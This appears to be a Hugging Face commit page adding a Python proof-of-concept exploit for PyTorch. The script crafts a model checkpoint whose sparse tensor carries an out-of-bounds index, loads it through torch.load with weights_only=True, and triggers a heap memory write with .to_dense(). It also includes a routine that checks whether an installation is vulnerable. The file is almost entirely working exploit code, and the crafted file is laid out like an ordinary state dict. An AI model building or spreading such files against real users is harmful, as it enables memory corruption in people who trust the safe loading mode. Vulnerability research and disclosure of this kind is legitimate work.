shimacoder committed on
Commit
238fd51
·
verified ·
1 Parent(s): 88c88e4

Upload poc_sparse_oob.py with huggingface_hub

Browse files
Files changed (1) hide show
  1. poc_sparse_oob.py +184 -0
poc_sparse_oob.py ADDED
@@ -0,0 +1,184 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ PoC: Sparse Tensor OOB Memory Corruption via torch.load(weights_only=True)
4
+
5
+ This PoC demonstrates that a crafted .pt file containing a sparse tensor
6
+ with out-of-bounds indices can be loaded with weights_only=True (the default
7
+ safe mode) and cause heap memory corruption when the tensor is used.
8
+
9
+ The root cause is that _validate_loaded_sparse_tensors() skips validation
10
+ when check_sparse_tensor_invariants is disabled (the default since PyTorch 2.8.0).
11
+
12
+ IMPACT: Heap OOB write when .to_dense() is called on the loaded sparse tensor.
13
+ AFFECTED: PyTorch >= 2.8.0 with weights_only=True (default since 2.6.0)
14
+
15
+ Usage:
16
+ python poc_sparse_oob.py --create # Creates malicious_model.pt
17
+ python poc_sparse_oob.py --load # Loads and triggers the bug
18
+ python poc_sparse_oob.py --check # Checks if current PyTorch is vulnerable
19
+ """
20
+
21
+ import argparse
22
+ import sys
23
+ import os
24
+
25
+
26
def check_vulnerability():
    """Report whether this PyTorch skips sparse-tensor validation on load.

    Three probes are run in order and the outcome of each is printed:

    1. whether ``torch.sparse.check_sparse_tensor_invariants`` is enabled;
    2. whether ``torch._utils._rebuild_sparse_tensor`` is listed by the
       ``weights_only`` unpickler's ``_get_allowed_globals()``;
    3. whether ``torch._utils._validate_loaded_sparse_tensors()`` rejects a
       queued sparse tensor whose index lies outside its declared size.

    Returns:
        bool: ``True`` only when every probe indicates that loaded sparse
        tensors are not validated. ``False`` otherwise, including when
        PyTorch or the private helpers used by the probes cannot be imported.
    """
    try:
        import torch
    except ImportError:
        print("[!] PyTorch is not installed. Install it to test.")
        return False

    print(f"[*] PyTorch version: {torch.__version__}")

    # Check 1: Is check_sparse_tensor_invariants disabled?
    invariants_enabled = torch.sparse.check_sparse_tensor_invariants.is_enabled()
    print(f"[*] Sparse tensor invariant checks enabled: {invariants_enabled}")

    if invariants_enabled:
        print("[*] NOT VULNERABLE: Sparse tensor invariant checks are enabled.")
        print(" This means _validate_loaded_sparse_tensors() will catch OOB indices.")
        return False

    # Checks 2 and 3 depend on private (underscore-prefixed) helpers, which
    # may be renamed or removed between releases; report that instead of
    # crashing with a traceback.
    try:
        from torch._weights_only_unpickler import _get_allowed_globals
        from torch._utils import (
            _sparse_tensors_to_validate,
            _validate_loaded_sparse_tensors,
        )
    except ImportError as exc:
        print(f"[!] Cannot import the PyTorch internals needed for this check: {exc}")
        return False

    # Check 2: Is _rebuild_sparse_tensor in the weights_only allowlist?
    allowed = _get_allowed_globals()
    rebuild_sparse_key = "torch._utils._rebuild_sparse_tensor"
    if rebuild_sparse_key in allowed:
        print("[*] _rebuild_sparse_tensor IS in the weights_only allowlist")
    else:
        print("[*] _rebuild_sparse_tensor is NOT in the weights_only allowlist")
        print(" NOT VULNERABLE via this vector.")
        return False

    # Check 3: Does _validate_loaded_sparse_tensors() actually validate?
    # The probe must be INVALID (index 999999 in a size-10 tensor): a valid
    # tensor passes validation silently, so it cannot tell "validation was
    # skipped" apart from "validation ran and succeeded".
    probe = torch.sparse_coo_tensor(
        torch.tensor([[999999]]),
        torch.tensor([1.0]),
        (10,),
        check_invariants=False,
    )
    _sparse_tensors_to_validate.append(probe)
    try:
        _validate_loaded_sparse_tensors()
    except RuntimeError as exc:
        # NOTE(review): assumes a validator that runs reports bad indices by
        # raising RuntimeError -- confirm against the installed PyTorch.
        print("[*] _validate_loaded_sparse_tensors() performed validation")
        print(f" Out-of-bounds probe was rejected: {exc}")
        return False
    finally:
        # Never leave the probe in the shared queue. Filter by identity:
        # list.remove() would compare tensors with ==, which is elementwise.
        _sparse_tensors_to_validate[:] = [
            queued for queued in _sparse_tensors_to_validate if queued is not probe
        ]

    print("[*] _validate_loaded_sparse_tensors() SKIPPED validation (out-of-bounds probe accepted)")
    print("[!] VULNERABLE: Sparse tensors loaded from files are NOT validated!")
    return True
75
+
76
+
77
def create_malicious_model(output_path="malicious_model.pt"):
    """Write a checkpoint whose sparse tensor carries an out-of-bounds index.

    The saved object is a dict with two ordinary dense tensors ("weight",
    "bias") and one sparse COO tensor ("sparse_layer") that declares size
    (10,) while holding the index 999999.

    Args:
        output_path: Destination file passed to ``torch.save``.

    Returns:
        The same ``output_path`` that was passed in.
    """
    import torch

    print(f"[*] Creating malicious model file: {output_path}")

    # 1-D case: three entries, the last of which lies far outside the
    # declared size of 10.
    declared_size = torch.Size([10])
    coo_indices = torch.tensor([[0, 7, 999999]])
    coo_values = torch.tensor([1.0, 2.0, 3.0])

    # Invariant checking is switched off both via the context manager and via
    # the keyword argument so the constructor accepts the bad index.
    with torch.sparse.check_sparse_tensor_invariants(False):
        crafted = torch.sparse_coo_tensor(
            coo_indices,
            coo_values,
            declared_size,
            check_invariants=False,
        )

    # Laid out like an ordinary state dict: two dense entries plus the
    # crafted sparse one.
    checkpoint = dict(
        weight=torch.randn(10, 10),
        bias=torch.randn(10),
        sparse_layer=crafted,
    )
    torch.save(checkpoint, output_path)

    summary = (
        f"[+] Malicious model saved to {output_path}",
        f" File size: {os.path.getsize(output_path)} bytes",
        f"[*] The 'sparse_layer' key contains a sparse tensor with OOB indices",
        f" Declared size: {declared_size}",
        f" Max index in indices: {coo_indices.max().item()}",
    )
    for line in summary:
        print(line)
    return output_path
113
+
114
+
115
def load_and_trigger(model_path="malicious_model.pt"):
    """Load a checkpoint with ``weights_only=True`` and densify its sparse entry.

    Prints details of the tensor stored under "sparse_layer", waits for the
    user to press Enter, then calls ``.to_dense()`` on it. Any ``Exception``
    raised during that final step is printed rather than propagated.

    Args:
        model_path: File passed to ``torch.load``.

    Returns:
        None.
    """
    import torch

    print(f"[*] Loading model from: {model_path}")
    print(f"[*] Using weights_only=True (the default safe mode)")

    # Expected to succeed: the loader is asked for weights only.
    loaded = torch.load(model_path, weights_only=True)

    print(f"[+] Model loaded successfully with weights_only=True")
    print(f"[*] Keys in state_dict: {list(loaded.keys())}")

    crafted = loaded["sparse_layer"]
    print(f"[*] Sparse tensor loaded:")
    print(f" Layout: {crafted.layout}")
    print(f" Size: {crafted.size()}")
    print(f" Indices shape: {crafted._indices().shape}")
    print(f" Max index: {crafted._indices().max().item()}")
    print(f" Invariant checks enabled: {torch.sparse.check_sparse_tensor_invariants.is_enabled()}")

    # Blank line, three warnings, blank line.
    banner = (
        "",
        "[!] About to call .to_dense() -- this will trigger OOB memory write!",
        "[!] The tensor has index 999999 but size is only 10",
        "[!] This writes to memory offset 999999 * sizeof(float) = ~4MB past buffer end",
        "",
    )
    for line in banner:
        print(line)

    # WARNING: the step after this prompt will likely crash or corrupt memory.
    input("Press Enter to trigger the OOB write (or Ctrl+C to abort)... ")

    try:
        densified = crafted.to_dense()
        print(f"[!] to_dense() completed (memory may be corrupted)")
        print(f" Dense shape: {densified.shape}")
        print(f" Dense values: {densified}")
    except Exception as err:
        print(f"[!] Exception during to_dense(): {type(err).__name__}: {err}")
152
+
153
+
154
def main():
    """Parse the command line and run the requested PoC steps.

    With none of ``--create``, ``--load`` or ``--check`` given, prints the
    help text and returns. ``--check`` runs the vulnerability check and exits
    the process with status 0 when it reports vulnerable, 1 otherwise; no
    other step runs in that case. Otherwise ``--create`` and then ``--load``
    are run if requested, both using the ``--output`` path.
    """
    cli = argparse.ArgumentParser(
        description="PoC: Sparse Tensor OOB via torch.load(weights_only=True)"
    )
    switches = (
        ("--create", "Create the malicious model file"),
        ("--load", "Load the malicious model and trigger the bug"),
        ("--check", "Check if the current PyTorch is vulnerable"),
    )
    for flag, description in switches:
        cli.add_argument(flag, action="store_true", help=description)
    cli.add_argument(
        "--output",
        default="malicious_model.pt",
        help="Output path for the malicious model file",
    )
    opts = cli.parse_args()

    if not (opts.create or opts.load or opts.check):
        cli.print_help()
        return

    if opts.check:
        # Exit status mirrors the verdict: 0 = vulnerable, 1 = not vulnerable.
        sys.exit(0 if check_vulnerability() else 1)

    if opts.create:
        create_malicious_model(opts.output)

    if opts.load:
        load_and_trigger(opts.output)


if __name__ == "__main__":
    main()